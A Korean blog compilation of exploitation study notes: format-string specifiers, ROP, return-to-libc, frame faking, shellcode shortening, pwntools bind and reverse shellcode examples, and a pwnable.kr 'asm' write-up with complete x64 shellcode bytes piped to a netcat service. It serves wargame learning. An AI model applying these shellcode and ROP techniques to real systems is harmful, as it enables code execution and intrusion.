%100$8lx => 100 : 스택에서 부터 100번째 자리에 있는 인자; 8 : 8자리로 맞추어 출력; lx : 16byte 형태로 4byte 출력
%hn => h=> 2byte 단위;
%d => 정수형 10진수 상수
%f => 실수형 상수(float)
%lf => 실수형 상수(double)
%c => 문자값
%s => 문자열
%u => 양의 정수(10진수)
%o => 양의 정수(8진수)
%x => 양의 정수(16진수)
%lx => 양의 정수 16진수형태로 4byte 출력
%n => int(쓰인 총 바이트 수)
%hn => %n의 반인 2 바이트 단위
%x 와 %p 와 %#x 의 차이
%x 는 나온 값을 16진수로 표현하지만 나온 숫자만을 표시한다면 ( 스택에 들어 있는 값 )
%p는 나온 값을 4byte형태로 나타내가 때문에 빈 곳은 0으로 채워 딱 맞추어 나타내고
%#x를 붙인다면 앞에 출력시 0x를 붙여서 출력시켜 준다.
ROP(Return Oriented Programming) - x86
ROP는 공격자가 실행 공간 보호(NX bit) 및 코드 서명(Code Signing)과 같은 보안 방어가 있는 상태에서 코드를 실행할 수 있게 해주는 기술입니다.
= RTL + Gadget
이 기법에서는 공격자는 프로그램의 흐름을 변경하기 위해 Stack Overflow 취약성이 필요하고, 가젯이라고 하는 해당 프로그램이 사용하는 메모리에 이미 있는 기계 명령어가 필요합니다.
ROP는 기본적으로 RTL 기법을 이용하며, 공격자는 RTL과 Gadgets을 이용해 공격에 필요한 코드를 프로그래밍 하는 것입니다.
PLT(Procedure Linkage Table) & GOT(Global Offset Table)
PLT에는 동적 링커가 공유 라이브러리의 함수를 호출하기 위한 코드가 저장되어 있습니다.
GOT(전역 오프셋 테이블)에는 동적 링커에 의해 공유 라이브러리에서 호출할 함수의 주소가 저장됩니다.
=>.got.plt 섹션에 저장
PLT와 GOT를 사용하는 이유
: Dynamic Link 방식으로 컴파일 하면 라이브러리가 프로그램 외부에 있기 때문에 함수의 주소를 알아오는 과정이 필요한 것입니다.
elfsymbol 찾고자하는 function_name => plt와 got 주소
쓸수 있는 공간 찾기 위한 방법
shell objdump -h ~/study/x86_rop/rop
ROP - x64
-------------------------------------------
Gadget(POP RDI, RET) Addr
-------------------------------------------
First argument value
-------------------------------------------
Gadget(POP RSI, POP RDX,ret) Addr
-------------------------------------------
Second argument value
-------------------------------------------
Third argument value
-------------------------------------------
read function address of libc
-------------------------------------------
Gadget(POP RDI, RET) Addr
-------------------------------------------
First argument value
-------------------------------------------
System fucntion address of libc
-------------------------------------------
1. setresuid(0,0,0) => 권한을 root(0)으로 변경
2. system 함수를 이용해 "/bin/sh" 실행
ROPgadget --binary path | grep "string"
| 2019.01.15 (0) | 2019.01.15 |
|---|---|
| 2019.01.10 (0) | 2019.01.10 |
| 2019.01.10 (0) | 2019.01.10 |
RTL(Return to Libc)
return address 영역에 공유 라이브러리 함수의 주소로 변경해 해당함수를 호출
x64 Calling convention
=> RDI, RSI, RDX, RCX, R8, R9 return=EAX
ROP(Return Oriented Programming)
ret2libc 기법을 사용하기 위해서는
Return Address 영역에 pop rdi, ret 코드가 저장된 주소값을 저장해야 합니다.
Retrun Address 다음영역에 해당 레지스터에 저장 할 인자 값을 저장합니다.
그 다음 영역에 호출 할 함수의 주소를 저장합니다.
Call 함수
push EIP+4
jmp 주소
Frame faking(Fake ebp)
Frame faking이란 가짜 스택 프레임 포인터(Stack Frame Pointer)를 만들어 실행 흐름을 제어하는 것입니다.
Return Address영역 까지만 덮어쓸수 있을 경우 사용 가능합니다.
LEAVE & RET Instruction
Instruction x86 x64
LEAVE mov esp, ebp mov rsp, rbp
pop ebp pop rbp
RET pop eip pop eip
jmp eip jmp rip
pop 명령어는 주소 안에 있는 값을 넣어준다
overflow로 frame pointer영역에 rtl 코드가 저장되어있는 주소 -0x4 주소를 저장
return address 영역에 leave 명령어가 저장되어 있는 주소를 저장
| 2019.01.19 (0) | 2019.01.19 |
|---|---|
| 2019.01.10 (0) | 2019.01.10 |
| 2019.01.10 (0) | 2019.01.10 |
Return to shellcode
=> Return address 영역에 Shellcode가 저장된 주소로 변경해, shellcode를 호출하는 방식
Call <Operation> ;
PUSH ReturnAddress
JMP <Operation>
RET ;
POP RIP
JMP RIP
shellcode를 실행하기 위해서는 Shellcode 저장영역에 execute 권한 설정이 필요
DEP 해제 => gcc 옵션으로 -z execstack 을 추가
| 2019.01.19 (0) | 2019.01.19 |
|---|---|
| 2019.01.15 (0) | 2019.01.15 |
| 2019.01.10 (0) | 2019.01.10 |
Assembly Code
section .data(문자열과 개행문자...); 데이터 세그먼트
section .text(ELF 링킹을 위한 초기 엔트리 포인트); 텍스트 세그먼트
assembly 파일 => ELF 바이너리
32bit 기준
nasm -f elf 만든파일.asm
ld -m elf_i386 -o 만들파일명 만든파일.o
64bit 기준
nasm -f elf64 만든파일.asm
ld -o 만들파일 만든파일.o
Shell Code Null Remove
- jmp 명령어를 사용해 helloworld 함수를 지나 last 함수로 이동
(즉 jmp 부분에서 콜하는 부분을 -로 표현하여 null 값을 없애준다)
레지스터 값 초기화
- sub는 OF,SF,ZF,AF,PF,CF flag, xor은 OF,CF가 지워지고 SF,ZF,PF는 설정되기 때문에
flag에 덜 영향을 주는 xor을 사용하여 초기화 하는것이 더 좋다
C언어 Shell 코드 실행 함수
execl, execlp, execle, execv, execvp, execve
uid 와 euid의 차이
uid는 실행하는 유저의 id, euid는 실행 될 때 유저의 id
/bin/sh을 push로 표현
/sh 문자앞에 / 를 추가하여 Null Byte 제거
쉘코드 길이 줄이기
CDQ(Convert Doubleword to Quadword) instruction
EAX에 저장된 부호값에 따라 EDX에 저장( 양수(SF=0)이면 0x00000000, 음수(SF=1)이면 0xFFFFFFFF)
=> 쉘코드 길이 XOR 보다 1바이트 줄인다
PUSH,POP 명령어를 이용
xor eax,eax; 31 C0 => push byte+0xb; 6A 0B
mov al,0xb; B0 0B => pop eax; 58
:1byte 줄이기
execve 줄이기
execve의 두번째 인자를 NULL 로 사용가능.
xchg Instruction
해당 명령어는 두 피연산자가 가지고 있는 값을 서로 교환하는 명령
Reverse ShellCode
Bind Shellcode 는 공격대상에 Server 형태로 Port를 오픈해 클라이언트가 접속하는 방식
Reverse Shellcode는 Port를 열어서 연결을 기다리는 대신 공격자가 ip,port로 연결합니다
연산 레지스터 : ecx
CMP 명령어 대신 DEC 명령어로 코드길이를 줄인다.
PwnTools
shellcraft 모듈을 제공
run_assembly()함수로 shellcode 실행
>>> shellcode = shellcraft.i386.linux.sh()
>>> p = run_assembly(shellcode)
bindsh()함수로 bind shellcode 생성
>>> from pwn import *
>>> shellcode = shellcraft.amd64.linux.bindsh(2345, 'ipv4')
>>> p = run_assembly(shellcode,arch='amd64')
>>> p.wait_for_close()
Reverse Shellcode
connect 함수로 네트워크 연결에 필요한 소켓을 생성 및 host에 연결하는 shellcode 생성
findpeersh()함수를 이용해 connect 함수에 의해 생성된 소켓에 표준 스트림을 복제
>>> from pwn import *
>>> assembly = shellcraft.i386.linux.connect('localhost', 2345, 'ipv4')
>>> assembly += shellcraft.i386.linux.findpeersh(2345)
| 2019.01.19 (0) | 2019.01.19 |
|---|---|
| 2019.01.15 (0) | 2019.01.15 |
| 2019.01.10 (0) | 2019.01.10 |
1. 연결
NC : p = remote("IP", PORT)
SSH : p = ssh( "id", " pwnable.kr", port= 포트번호", password = "비밀번호")
Local : p = process(["사용하고자 하는 파일 위치"])
2. 송수신
p.recv() : 데이터를 받는다
p.recv(숫자) : 숫자만큼 데이터를 받는다
p.recvuntil("str") : str , 즉 문자열이 나올때 까지 받는다
p.recvline() : 한줄 받아온다.
p.sendline("str") : 문자열을 보낸다.
p.sendlineafter : 데이터를 받으면서 보낸다
pwnable.kr tiny_easy에서 사용 할 수 있는 process 에서 환경변수 삽입
argv[0]를 실행시킬떄 원하는 값으로 수정할 수 있는 방법
예시 ) s1 = s.process(['\xb0\xaf\xb5\xff'],executable = '/home/tiny_easy/tiny_easy', env = k)
| Format-string bug (0) | 2019.06.20 |
|---|---|
| FMbug (0) | 2018.08.26 |
| Format-string bug (0) | 2019.06.20 |
|---|---|
| Pwntools (0) | 2018.08.28 |
우선 asm파일과 asm.c 파일 그리고 플래그 this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong파일, readme파일이 있습니다. 이때 우리는 긴 플래그 파일을 열어야합니다. 우리는 asm을 실행해본다면 read, write, open 함수를 사용하여 64bit 쉘코드를 입력하라고 한다. 따라서 우리는 먼저 어떻게 어셈으로 코딩할지 c로 짜보고 코딩해보자.
FMbug#include <string.h>
#include <unistd.h>
#include <fcntl.h>
int main()
{
int fd;
char buf[1024];
fd = open("./this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong", O_RDONLY);
read(fd, buf, 1024);
write(1, buf, 1024);
// puts(buf);
return ;
}
이런식의 c언어를 어셈블리로 짜보자 우선 python 소스를 짜서 긴 flag 파일을 넣어줄 수 있게 little endian 방식으로 만들어 주어야 한다. 또 우리는 x64소스를 짜는 데 x64는 mov 만 16bit를 넣어줄 수 있기 때문에 넣을 값을 rax값에 넣고 rax를 push 하는 방식으로 사용해야 한다.
먼저 python 소스를 보자
a = "this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong".encode("hex")
b=[]
c=[]
for i in range(0,len(a)/2+1):
b.append(a[i*2:i*2+2])
#b[i] = "\\x"+b[i]
b.reverse()
#print(b)
for j in range(0,len(b)/8):
c.append(b[j*8]+b[j*8+1]+b[j*8+2]+b[j*8+3]+b[j*8+4]+b[j*8+5]+b[j*8+6]+b[j*8+7])
h=0
for k in c:
print "mov rax, 0x"+k
print "push rax"
이 파이썬을 돌리면 우리는 넣을 수 있는 코드를 만들 수 있다.
section .data
section .bss
buf: resb 4
section .text
global _start
_start:
push rbp
mov rbp, rsp
mov rax, 0x676e6f306f306f30
push rax
mov rax, 0x6f306f306f306f30
push rax
mov rax, 0x3030303030303030
push rax
mov rax, 0x3030306f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f303030303030
push rax
mov rax, 0x3030303030303030
push rax
mov rax, 0x3030303030303030
push rax
mov rax, 0x3030306f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6c
push rax
mov rax, 0x5f797265765f7369
push rax
mov rax, 0x5f656d616e5f656c
push rax
mov rax, 0x69665f6568745f79
push rax
mov rax, 0x72726f732e656c69
push rax
mov rax, 0x665f736968745f64
push rax
mov rax, 0x6165725f65736165
push rax
mov rax, 0x6c705f656c69665f
push rax
mov rax, 0x67616c665f726b2e
push rax
mov rax, 0x656c62616e77705f
push rax
mov rdx, 0x0
mov rsi, 0x0
mov rdi, rsp
mov rax, 2
syscall
mov rdi, rax
mov rsi, buf
mov rdx, 100
mov rax, 0
syscall
mov rdi, 1
mov rsi, buf
mov rdx, 100
mov rax, 1
syscall
이렇게 만들어 주면 우리는 read, write, open을 사용하여 로컬 환경에서 flag를 띄워 줄 수 있는 어셈 소스를 만들었다. 그렇다면 우리는 이 환경이 아닌 pwnable에서 가능한 어셈을 만들어 주어야 한다.
이것을 우리는 기계어로 바꾸어 주어야 한다. 다른 문제에서는 null 값을 제거 해주어야 하지만 이 문제에서는 null을 신경안써도 된다.
위의 코드는 로컬환경에서 만든 소스이기 때문에 buf 값을 우리가 정해서 사용했지만 실제 코드를 실행시키기 위해서는 c 파일에 있는 char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);에서 할당된 영역안으로 넣어주어야 한다.
따라서 우리는
section .data
section .bss
buf: resb 4
section .text
global _start
_start:
mov rax, 0x676e6f306f306f
push rax
mov rax, 0x306f306f306f306f
push rax
mov rax, 0x3030303030303030
push rax
mov rax, 0x303030306f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f3030303030
push rax
mov rax, 0x3030303030303030
push rax
mov rax, 0x3030303030303030
push rax
mov rax, 0x303030306f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6c5f797265765f73
push rax
mov rax, 0x695f656d616e5f65
push rax
mov rax, 0x6c69665f6568745f
push rax
mov rax, 0x7972726f732e656c
push rax
mov rax, 0x69665f736968745f
push rax
mov rax, 0x646165725f657361
push rax
mov rax, 0x656c705f656c6966
push rax
mov rax, 0x5f67616c665f726b
push rax
mov rax, 0x2e656c62616e7770
push rax
mov rax, 0x5f73695f73696874
push rax
mov rdx, 0x0
mov rsi, 0x0
mov rdi, rsp
mov rax, 2
syscall
mov rdi, rax
mov rsi, 0x41414800
mov rdx, 100
mov rax, 0
syscall
mov rdi, 1
mov rsi, 0x41414800
mov rdx, 100
mov rax, 1
syscall
위의 소스로 쉘코드를 만들어 주면 된다.
objdump -D ‘실행파일명’ 을 뽑아내어 쉘코드를 하나하나 숫자를 이어붙여도 되지만 편하게 하기위해서 https://defuse.ca/online-x86-assembler.htm 이곳에서 위의 소스를 붙여넣어주면 우리는 쉘코드를 획득할 수 있다.
그렇게 변환시켜주게 되면 나온 소스를 pwnable 서버에 파이썬 소스를 만들어 실행시켜주어야 한다.
a = "\x48\xB8\x6F\x30\x6F\x30\x6F\x6E\x67\x00\x50\x48\xB8\x6F\x30\x6F\x30\x6F\x30\x6F\x30\x50\x48\xB8\x30\x30\x30\x30\x30\x30\x30\x30\x50\x48\xB8\x6F\x6F\x6F\x6F\x30\x30\x30\x30\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x30\x30\x30\x30\x30\x6F\x6F\x6F\x50\x48\xB8\x30\x30\x30\x30\x30\x30\x30\x30\x50\x48\xB8\x30\x30\x30\x30\x30\x30\x30\x30\x50\x48\xB8\x6F\x6F\x6F\x6F\x30\x30\x30\x30\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x73\x5F\x76\x65\x72\x79\x5F\x6C\x50\x48\xB8\x65\x5F\x6E\x61\x6D\x65\x5F\x69\x50\x48\xB8\x5F\x74\x68\x65\x5F\x66\x69\x6C\x50\x48\xB8\x6C\x65\x2E\x73\x6F\x72\x72\x79\x50\x48\xB8\x5F\x74\x68\x69\x73\x5F\x66\x69\x50\x48\xB8\x61\x73\x65\x5F\x72\x65\x61\x64\x50\x48\xB8\x66\x69\x6C\x65\x5F\x70\x6C\x65\x50\x48\xB8\x6B\x72\x5F\x66\x6C\x61\x67\x5F\x50\x48\xB8\x70\x77\x6E\x61\x62\x6C\x65\x2E\x50\x48\xB8\x74\x68\x69\x73\x5F\x69\x73\x5F\x50\x48\xC7\xC2\x00\x00\x00\x00\x48\xC7\xC6\x00\x00\x00\x00\x48\x89\xE7\x48\xC7\xC0\x02\x00\x00\x00\x0F\x05\x48\x89\xC7\x48\xC7\xC6\x00\x48\x41\x41\x48\xC7\xC2\x64\x00\x00\x00\x48\xC7\xC0\x00\x00\x00\x00\x0F\x05\x48\xC7\xC7\x01\x00\x00\x00\x48\xC7\xC6\x00\x48\x41\x41\x48\xC7\xC2\x64\x00\x00\x00\x48\xC7\xC0\x01\x00\x00\x00\x0F\x05"
import sys
sys.stdout.write(a)
이렇게 만든 파이썬 소스를 tmp폴더에 자신만의 다른 폴더를 만들고 소스를 넣어주고 난 후에 asm에 돌리면 fake flag라고 뜬다. 그래서 readme 파일을 만들어보면 nc 0 9026으로 보내주라고 나온다.
따라서 우리는 python /tmp/자신이만든 폴더/만든 소스.py | nc 0 9026 을 입력해 주면 우리가 원하는 플래그가 나온다.
| pwnable.kr 4번 [flag] (0) | 2018.04.14 |
|---|---|
| pwnable.kr 3번 [bof] (0) | 2018.04.13 |
| pwnable.kr 2번 [collision] (0) | 2018.04.12 |
| pwnable.kr 1번 [fd] (0) | 2018.04.10 |